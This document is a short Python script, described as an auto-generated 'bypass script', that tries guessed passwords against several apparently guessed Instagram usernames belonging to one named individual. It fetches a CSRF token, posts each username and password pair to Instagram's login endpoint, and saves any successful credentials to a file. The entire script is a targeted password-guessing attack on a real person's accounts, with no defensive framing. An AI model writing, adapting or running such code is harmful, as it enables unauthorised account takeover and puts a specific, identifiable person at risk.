#!/usr/bin/env python3
"""
Quick Test - Top Alex Fleming Account Targets
Auto-generated bypass script for highest priority accounts
"""

import requests
import json
import time
from datetime import datetime

def quick_test():
    print("🎯 Quick Test - Alex Fleming Top Targets")
    print("=" * 40)
    
    accounts = ['alex.fleming.2025', 'alx.whatilove1728', 'alex.fleming.2023', '2023alex.fleming', 'whatilove1728.2023']
    passwords = ['Fleming654', 'whatilove1728', 'WhatILove1728', 'fleming654', 'Fleming1728', 'whatilove654', 'AlexFleming654', 'alexfleming654']
    
    successes = []
    
    for account in accounts:
        print(f"\n👤 Testing: {account}")
        
        for password in passwords:
            print(f"   🔑 {password}")
            
            if test_login(account, password):
                success = {"account": account, "password": password, "time": datetime.now().isoformat()}
                successes.append(success)
                print(f"   ✅ SUCCESS! {account}:{password}")
                
                # Save immediately
                with open(f"QUICK_SUCCESS_{account}_{datetime.now().strftime('%H%M%S')}.json", 'w') as f:
                    json.dump(success, f, indent=2)
                
                break  # Move to next account
            else:
                print(f"   ❌ Failed")
            
            time.sleep(3)  # Rate limiting
    
    return successes

def test_login(username, password):
    """Simple login test"""
    try:
        session = requests.Session()
        
        # Get CSRF token
        response = session.get("https://www.instagram.com/accounts/login/", timeout=10)
        csrf_token = session.cookies.get('csrftoken', '')
        
        headers = {
            'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15',
            'X-CSRFToken': csrf_token,
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        
        data = {
            'username': username,
            'password': password,
            'queryParams': '{}',
            'optIntoOneTap': 'false'
        }
        
        response = session.post(
            "https://www.instagram.com/accounts/login/ajax/",
            data=data,
            headers=headers,
            timeout=10
        )
        
        if response.status_code == 200:
            try:
                result = response.json()
                if result.get('authenticated'):
                    return True
            except:
                pass
        
        return False
        
    except Exception:
        return False

if __name__ == "__main__":
    results = quick_test()
    print(f"\n🏁 Quick test complete. Successes: {len(results)}")
